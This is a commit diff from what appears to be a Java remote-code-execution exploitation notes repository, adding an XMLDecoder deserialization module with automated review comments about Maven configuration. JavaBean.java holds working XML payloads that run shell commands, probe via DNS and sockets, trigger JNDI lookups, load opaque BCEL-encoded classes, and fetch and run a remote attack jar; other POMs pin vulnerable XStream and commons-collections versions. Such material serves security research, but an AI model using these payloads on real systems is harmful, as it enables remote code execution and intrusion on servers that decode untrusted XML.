
Commit 64d8c51

committed
add XMLSerialization :)
1 parent 2dd9a4e commit 64d8c51


7 files changed

+395
-35
lines changed


README.md

+42-6
Original file line numberDiff line numberDiff line change
@@ -4,29 +4,35 @@ By. Whoopsunix
44

55
# 0x00 do what?
66

7-
🚀 对照实战场景梳理较通用的 Java Rce 相关漏洞的利用方式
7+
🚀 记录贴 对照实战场景梳理较通用的 Java Rce 相关漏洞的利用方式或知识点
88

9-
🚩 对于研究过的组件会针对可利用版本进行一个梳理 详情见代码
9+
🚩 对于实际环境遇到过的组件如有必要会针对可利用版本进行一个梳理 详情见代码
1010

1111
🚧 长期项目 不定期学习后更新......
1212

1313
## 目录
1414

15-
- [命令执行](#0x01-command)
15+
- [0x01 命令执行](#0x01-command)
1616
- 执行Demo,java jsp
1717
- 执行结果输出(InputStream 处理Demo)
18-
- [表达式注入](#0x02-expression-inject)
18+
- [0x02 表达式注入](#0x02-expression-inject)
1919
- [OGNL](#ognl)
2020
- [EL](#el)
2121
- [com.example.spelattack.SPEL](#spel)
22-
- [JDBC Attack](#0x03-jdbc-attack)
22+
- [0x03 JDBC Attack](#0x03-jdbc-attack)
2323
- [Mysql](#mysql)
2424
- [PostgreSQL](#postgresql)
2525
- [H2database](#h2database)
2626
- [IBM DB2](#ibmdb2)
2727
- [ModeShape](#modeshape)
2828
- [Apache Derby](#apache-derby)
2929
- [Sqlite](#sqlite)
30+
- [0x04 Serialization](#0x04-serialization)
31+
- [BCEL](#bcel)
32+
- [远程Jar加载](#remotejar)
33+
- [XMLSerialization](#xmlserialization)
34+
- [JavaBean](#jarbean)
35+
- [XStream](#xstream)
3036
- [鸣谢](#Thanks)
3137

3238
目前涵盖:命令执行及输出、表达式及输出、JDBC
@@ -125,6 +131,36 @@ By. Whoopsunix
125131

126132
- [x] RCE
127133

134+
# 0x04 [Serialization](Serialization)
135+
136+
## [BCEL](Serialization/BCELAttack)
137+
138+
- [x] static 触发
139+
- [x] 构造方法触发
140+
- [x] 方法触发
141+
142+
## [RemoteJar](Serialization/AttackJar)
143+
144+
- [x] static 触发
145+
- [x] 构造方法触发
146+
- [x] 方法触发
147+
148+
## [XMLSerialization](Serialization/XMLSerialization)
149+
150+
### [JarBean](Serialization/XMLSerialization/JavaBean)
151+
152+
- [x] 命令执行 Runtime、ProcessBuilder、js
153+
- [x] 探测用Payload
154+
- DNSLOG、SOCKETLOG
155+
- 延时
156+
- [x] JNDI
157+
- [x] BCEL
158+
- [x] RemoteJar
159+
160+
### XStream
161+
162+
主要为 CVE 不具体展开
163+
128164
# Thanks
129165

130166
感谢师傅们的研究 带来了很大的帮助 :)
@@ -139,4 +175,4 @@ By. Whoopsunix
139175
>
140176
> https://forum.butian.net/share/886
141177
>
142-
> https://github.com/woodpecker-appstore/jexpr-encoder-utils
178+
> https://github.com/woodpecker-appstore
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,42 @@
1+
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
2+
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
3+
<modelVersion>4.0.0</modelVersion>
4+
5+
<groupId>org.example</groupId>
6+
<artifactId>JavaBean</artifactId>
7+
<version>1.0-SNAPSHOT</version>
8+
<packaging>jar</packaging>
9+
10+
<name>JavaBean</name>
11+
12+
<properties>
13+
<project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
14+
</properties>
15+
16+
<dependencies>
17+
<dependency>
18+
<groupId>junit</groupId>
19+
<artifactId>junit</artifactId>
20+
<version>3.8.1</version>
21+
<scope>test</scope>
22+
</dependency>
23+
</dependencies>
24+
25+
<build>
26+
<plugins>
27+
<plugin>
28+
<groupId>org.springframework.boot</groupId>
29+
<artifactId>spring-boot-maven-plugin</artifactId>
30+
</plugin>
31+
<plugin>
32+
<groupId>org.apache.maven.plugins</groupId>
33+
<artifactId>maven-compiler-plugin</artifactId>
34+
<version>3.8.1</version>
35+
<configuration>
36+
<source>1.8</source>
37+
<target>1.8</target>
38+
</configuration>
39+
</plugin>
40+
</plugins>
41+
</build>
42+
</project>
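Review bot: The `spring-boot-maven-plugin` declared at lines 27-30 of this new pom.xml has no `<version>` and no Spring Boot parent or dependency to inherit one from, so Maven will warn and resolve whatever the latest version in the repository is at build time, making the build non-reproducible. Nothing visible in the module uses Spring Boot (the only dependency is test-scoped junit 3.8.1), so the cleanest fix is to delete that `<plugin>` element; if it is needed, pin it with an explicit `<version>PINNED-VERSION</version>` (placeholder) like the compiler plugin at line 34 already does.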
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,186 @@
1+
package org.example;
2+
3+
import java.beans.XMLDecoder;
4+
import java.io.ByteArrayInputStream;
5+
6+
/**
7+
* @author Whoopsunix
8+
*/
9+
public class JavaBean {
10+
public static void main(String[] args) {
11+
/**
12+
* 命令执行
13+
*/
14+
// ProcessBuilder
15+
String processBuilder = "<java>\n" +
16+
" <object class=\"java.lang.ProcessBuilder\">\n" +
17+
" <array class=\"java.lang.String\" length=\"3\" >\n" +
18+
" <void index=\"0\">\n" +
19+
" <string>/bin/sh</string>\n" +
20+
" </void>\n" +
21+
" <void index=\"1\">\n" +
22+
" <string>-c</string>\n" +
23+
" </void>\n" +
24+
" <void index=\"2\">\n" +
25+
" <string>open -a Calculator.app</string>\n" +
26+
" </void>\n" +
27+
" </array>\n" +
28+
" <void method=\"start\"/>\n" +
29+
" </object>\n" +
30+
"</java>";
31+
// runtime
32+
String runtime= "<java>\n" +
33+
" <object class=\"java.lang.Runtime\" method=\"getRuntime\">\n" +
34+
" <void method=\"exec\">\n" +
35+
" <array class=\"java.lang.String\" length=\"3\" >\n" +
36+
" <void index=\"0\">\n" +
37+
" <string>/bin/sh</string>\n" +
38+
" </void>\n" +
39+
" <void index=\"1\">\n" +
40+
" <string>-c</string>\n" +
41+
" </void>\n" +
42+
" <void index=\"2\">\n" +
43+
" <string>open -a Calculator.app</string>\n" +
44+
" </void>\n" +
45+
" </array>\n" +
46+
" <void>\n" +
47+
" <void method=\"start\"/>\n" +
48+
" </object>\n" +
49+
"</java>";
50+
51+
/**
52+
* 延时
53+
*/
54+
String sleep = "<java>\n" +
55+
" <object class=\"java.lang.Thread\">\n" +
56+
" <void method=\"sleep\">\n" +
57+
" <long>10000</long>\n" +
58+
" </void>\n" +
59+
" </object>\n" +
60+
"</java>";
61+
62+
/**
63+
* 探测
64+
*/
65+
String HTTPLOG = "<java>\n" +
66+
" <new class=\"java.net.URL\">\n" +
67+
" <string>http://hostname</string>\n" +
68+
" <void method=\"getContent\"/>\n" +
69+
" </new>\n" +
70+
"</java>";
71+
72+
String SOCKETLOG = "<java>\n" +
73+
"<object class=\"java.net.Socket\">\n" +
74+
" <string>127.0.0.1</string>\n" +
75+
" <int>1234</int>\n" +
76+
"</object>\n" +
77+
"</java>";
78+
79+
/**
80+
* jndi todo 还需要完善其他情况
81+
*/
82+
String jndi = "<java>\n" +
83+
" <void class=\"com.sun.rowset.JdbcRowSetImpl\">\n" +
84+
" <void property=\"dataSourceName\">\n" +
85+
" <string>ldap://127.0.0.1:1389/Basic/Command/open -a Calculator.app</string>\n" +
86+
" </void>\n" +
87+
" <void property=\"autoCommit\">\n" +
88+
" <boolean>true</boolean>\n" +
89+
" </void>\n" +
90+
" </void>\n" +
91+
"</java>";
92+
93+
/**
94+
* BCEL
95+
*/
96+
// static
97+
String bcel = "<java>\n" +
98+
" <void class =\"com.sun.org.apache.bcel.internal.util.ClassLoader\">\n" +
99+
" <void method=\"loadClass\">\n" +
100+
" <string>$$BCEL$$$l$8b$I$A$A$A$A$A$A$AePMO$c2$40$U$9c$85B$a1$96$af$o$f8$adx$SL$84$Y$8f$Q$P$S$bdH$d4$88$c1$f3R7uIi$9b$d2$g$fe$91g$$j$3c$f8$D$fcQ$c6$d7J$90$e8$kv$f6$cd$9b$99$b7$bb$9f_$ef$l$A$8e$b1$a7A$85$a1$a1$8c$d5$M$w$RVU$ac$a9XW$b1$c1$90$eeHG$G$a7$M$c9zc$c0$a0t$dd$H$c1P$e8IG$5c$85$e3$a1$f0$ef$f8$d0$s$c6$e8$b9$s$b7$H$dc$97Q$3d$t$95$e0QN$e2$9eo$b5$c4$94$8f$3d$5b$b4$ce$a7$c2l3d$3a$a6$3d$8f$d6$fan$e8$9b$e2BF$9el$d4o$8e$f8$T$d7$91AV$c5$a6$8e$zl3T$5dO8$b5$p$5e$ebr$db$Mm$k$b8$7e$93$7b$9e$8e$j$ec2$94$pG$cb$e6$8eE$DL$e1$F$d2u$Y$8a$7f$H$T$f5$x$bc$k$8e$84$Z0$94$7e$a9$db$d0$J$e4$98$ae$a1Y$oX$U$95z$a3$f7OCoPD$iyP_$ea$f6$D_$3aV$7b$d9p$e3$bb$a6$98L$da$d8G$9a$fe$3aZ$J$b0$e8u$b4kT$9d$Q2$c2$d4$e1$x$d8$yn$af$d0$ae$R$82$M$KIu$3a$e9$3f$o$e4$90$t$cc$a0$b0$I8$8b$D$81$fc$h$SF$f2$F$ca$fd3$94$cbY$cce$c9$97$9a$t$g$94$V$e5d$vA$a7$9c$ie$e8$f1$3c$90$b6$Y$9fJ$df$e0$d7r$ac$g$C$A$A</string>\n" +
101+
" <void method=\"newInstance\"/>\n" +
102+
" </void>\n" +
103+
" </void>\n" +
104+
"</java>";
105+
106+
// 通过构造方法传入,具体参考 BCEL demo
107+
String bcelArg = "<java>\n" +
108+
" <new class =\"com.sun.org.apache.bcel.internal.util.ClassLoader\">\n" +
109+
" <void method=\"loadClass\">\n" +
110+
" <string>$$BCEL$$$l$8b$I$A$A$A$A$A$A$Am$91MO$c2$40$Q$86$df$a5$c5j$a9$96$82$e0$b7$c6$93$a0$89$8d$f1$8811$GO$f5$pb$f0$e4$a1$94M$5d$d2$PR$8a$e1$ly$e6$a2$c6$83$3f$c0$le$9c$F$o$s$d0$c3$cc$ce$3b$ef$3e3$9b$7e$ff$7c$7e$B8$c1$9e$8e$F$Uu$ac$a2$qCY$c3$9a$86u$N$h$M$Lg$o$S$e99$83R$a96$Z$d4$cb$b8$cd$ZLGD$fc$a6$l$b6x$f2$e0$b6$CR$KN$ec$b9A$d3M$84$ac$t$a2$9a$3e$8b$kC$c9$89$T$df$e6$D7$ec$G$dc$ae$P$b8w$91$f85$d2$xN$c7$7dq$ed$c0$8d$7c$bb$91$s$o$f2kr$88$e2$85mI$9ci2$e8$8d$b8$9fx$fcJH$bc1A$jK$a3$B$N$8b$g6$Nla$db$c0$Ov$Z$8aSB$7d$e0$f1n$w$e2$88$d49$db0$e4$a7$de$dbV$87$7b$v$835$95$ee$fbQ$wB$9a$a9$fb$3c$fd$xJ$95$aa3$e3$a1$zUNT$86$83y$ef$fb$t$dd$r$b1$c7$7b$bd$g$f6$91$a5$l$m$bf$M$98$7c$H$c5$r$aaN$v3$ca$d9$c3w$b0$e1$a8$adS$d4$v$83l$w$Zst2$c6$s$ca$cb$94$r$60e$Cx$o$a7B$d9$92$80$Pd$8e$de$a0$3c$beB$bd$k$92A$a5$L$s$c51$b4L$A$89$96$aaA$A$93$60y$8a$b9QO$O$b4$s$D$e4$c9$a4$9e$dc$cd$g$zU$f8$F$P$W$$$EJ$C$A$A</string>\n" +
111+
" <void method=\"getConstructor\">\n" +
112+
" <array class=\"java.lang.Class\" length=\"1\">\n" +
113+
" <void index=\"0\"><class><string>java.lang.String</string></class></void>\n" +
114+
" </array>\n" +
115+
" <void method=\"newInstance\">\n" +
116+
" <array class=\"java.lang.Object\" length=\"1\">\n" +
117+
" <void index=\"0\"><string>open -a Calculator.app</string></void>\n" +
118+
" </array>\n" +
119+
" </void>\n" +
120+
" </void>\n" +
121+
" </void>\n" +
122+
" </new>\n" +
123+
"</java>";
124+
125+
/**
126+
* load jar
127+
*/
128+
// static
129+
String loadJar = "<java>\n" +
130+
" <new class=\"java.net.URLClassLoader\">\n" +
131+
" <array class=\"java.net.URL\" length=\"1\">\n" +
132+
" <void index=\"0\"><object class=\"java.net.URL\"><string>http://127.0.0.1:1234/AttackJar-1.0.jar</string></object></void>\n" +
133+
" </array>\n" +
134+
" <void method=\"loadClass\">\n" +
135+
" <string>org.example.Exec</string>\n" +
136+
" <void method=\"newInstance\"/>\n" +
137+
" </void>\n" +
138+
" </new>\n" +
139+
"</java>";
140+
// 通过构造方法传入,具体参考 AttackJar demo
141+
String loadJarArg = "<java>\n" +
142+
" <new class=\"java.net.URLClassLoader\">\n" +
143+
" <array class=\"java.net.URL\" length=\"1\">\n" +
144+
" <void index=\"0\"><object class=\"java.net.URL\"><string>http://127.0.0.1:1234/AttackJar-1.0.jar</string></object></void>\n" +
145+
" </array>\n" +
146+
" <void method=\"loadClass\">\n" +
147+
" <string>org.example.ExecArg</string>\n" +
148+
" <void method=\"getConstructor\">\n" +
149+
" <array class=\"java.lang.Class\" length=\"1\">\n" +
150+
" <void index=\"0\"><class><string>java.lang.String</string></class></void>\n" +
151+
" </array>\n" +
152+
" <void method=\"newInstance\">\n" +
153+
" <array class=\"java.lang.Object\" length=\"1\">\n" +
154+
" <void index=\"0\"><string>open -a Calculator.app</string></void>\n" +
155+
" </array>\n" +
156+
" </void>\n" +
157+
" </void>\n" +
158+
" </void>\n" +
159+
" </new>\n" +
160+
"</java>";
161+
162+
/**
163+
* js
164+
*/
165+
String js = "<java>\n" +
166+
" <new class=\"javax.script.ScriptEngineManager\">\n" +
167+
" <void method=\"getEngineByName\">\n" +
168+
" <string>js</string>\n" +
169+
" <void method=\"eval\">\n" +
170+
" <string><![CDATA[java.lang./**/Runtime./**/getRuntime().exec('open /System/Applications/Calculator.app');]]></string>\n" +
171+
" </void>\n" +
172+
" </void>\n" +
173+
" </new>\n" +
174+
"</java>";
175+
176+
xmlDecoder(js);
177+
}
178+
179+
public static Object xmlDecoder(String payload) {
180+
System.out.println(payload);
181+
XMLDecoder xmlDecoder = new XMLDecoder(new ByteArrayInputStream(payload.getBytes()));
182+
Object obj = xmlDecoder.readObject();
183+
xmlDecoder.close();
184+
return obj;
185+
}
186+
}
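Review bot: In `xmlDecoder` (new lines 179-185) `payload.getBytes()` uses the platform default charset and the `XMLDecoder` is only closed when `readObject()` returns normally, so a payload that throws leaves the decoder open. Both are fixed by `try (XMLDecoder xmlDecoder = new XMLDecoder(new ByteArrayInputStream(payload.getBytes(StandardCharsets.UTF_8)))) { return xmlDecoder.readObject(); }` with `import java.nio.charset.StandardCharsets;` added at the top. The helper is also undocumented; a Javadoc along the lines of `/** Feeds the given XML to java.beans.XMLDecoder, which instantiates and calls whatever classes the document names — this is the sink under study, and it must never be reached by untrusted input. */` would tell a reader what the method is for and why the class exists. The `System.out.println(payload)` at line 180 echoes the full document on every call, which is presumably intended for the demo; a short comment saying so would keep it from being mistaken for leftover debugging.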
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,31 @@
1+
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
2+
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
3+
<modelVersion>4.0.0</modelVersion>
4+
5+
<groupId>org.example</groupId>
6+
<artifactId>XStreamAttack</artifactId>
7+
<version>1.0-SNAPSHOT</version>
8+
<packaging>jar</packaging>
9+
10+
<name>XStreamAttack</name>
11+
12+
<properties>
13+
<project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
14+
</properties>
15+
16+
<dependencies>
17+
<dependency>
18+
<groupId>com.thoughtworks.xstream</groupId>
19+
<artifactId>xstream</artifactId>
20+
<version>1.4.17</version>
21+
</dependency>
22+
23+
<dependency>
24+
<groupId>commons-collections</groupId>
25+
<artifactId>commons-collections</artifactId>
26+
<version>3.2.1</version>
27+
</dependency>
28+
</dependencies>
29+
30+
31+
</project>
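Review bot: The two exact versions pinned at lines 20 and 26 (`xstream` 1.4.17 and `commons-collections` 3.2.1) are presumably chosen to match the XStream CVEs the README section mentions, but nothing in the POM records that, so a reader or a dependency scanner will treat them as stale dependencies that should be bumped. An XML comment above `<dependencies>` such as `<!-- versions pinned deliberately for the XStream demos; bumping them changes what the demos exercise -->` would make the intent explicit. This module also declares no `<parent>`, so it inherits nothing from the XMLSerialization aggregator and compiles at Maven's default source/target level.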
+14-29
Original file line numberDiff line numberDiff line change
@@ -1,37 +1,22 @@
11
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
2-
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
3-
<modelVersion>4.0.0</modelVersion>
2+
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
3+
<modelVersion>4.0.0</modelVersion>
44

5-
<groupId>org.example</groupId>
6-
<artifactId>XMLSerialization</artifactId>
7-
<version>1.0-SNAPSHOT</version>
8-
<packaging>jar</packaging>
5+
<groupId>org.example</groupId>
6+
<artifactId>XMLSerialization</artifactId>
7+
<version>1.0-SNAPSHOT</version>
8+
<packaging>pom</packaging>
99

10-
<name>XMLSerialization</name>
10+
<name>XMLSerialization</name>
1111

12-
<properties>
13-
<project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
14-
</properties>
12+
<modules>
13+
<module>JavaBean</module>
14+
<module>XStreamAttack</module>
15+
</modules>
1516

16-
<dependencies>
17+
<properties>
18+
<project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
19+
</properties>
1720

18-
</dependencies>
1921

20-
<build>
21-
<plugins>
22-
<plugin>
23-
<groupId>org.springframework.boot</groupId>
24-
<artifactId>spring-boot-maven-plugin</artifactId>
25-
</plugin>
26-
<plugin>
27-
<groupId>org.apache.maven.plugins</groupId>
28-
<artifactId>maven-compiler-plugin</artifactId>
29-
<version>3.8.1</version>
30-
<configuration>
31-
<source>1.8</source>
32-
<target>1.8</target>
33-
</configuration>
34-
</plugin>
35-
</plugins>
36-
</build>
3722
</project>
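Review bot: The parent now aggregates `JavaBean` and `XStreamAttack` (new lines 12-15) but neither child pom in this commit declares a `<parent>`, so the `<properties>` kept at new lines 17-19 reach no module and the compiler configuration removed from this file is re-declared only in JavaBean. Either add a `<parent>` element pointing at `org.example:XMLSerialization:1.0-SNAPSHOT` to each child, or drop the now-unused `<properties>` block here. Once the children inherit, the `maven-compiler-plugin` `<source>`/`<target>` settings belong in a `<pluginManagement>` section of this pom so both modules build at the same level.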
